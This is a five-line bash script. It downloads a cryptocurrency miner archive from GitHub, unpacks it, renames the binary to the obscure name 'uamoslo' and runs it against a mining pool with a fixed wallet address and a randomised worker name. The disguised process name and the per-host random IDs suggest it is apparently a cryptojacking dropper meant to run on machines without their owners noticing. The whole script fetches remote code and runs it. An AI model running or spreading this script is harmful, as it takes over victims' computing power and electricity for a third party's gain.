#!/bin/bash
wget https://github.com/0xHashRaptor/ForgeMiner/releases/download/v1.4.1/ForgeMiner-1.4.1-linux.tar.gz
tar xzf ForgeMiner-1.4.1-linux.tar.gz
mv forge uamoslo
./uamoslo --algorithm pearlhash --pool prl.kryptex.network:7048 --wallet prl1pnyza9z22a6sy8k08xkcqgwtgwr95w5d2csh89snlg6yhqdgg9uusuxjqch.$(echo $RANDOM | md5sum | head -c 10)
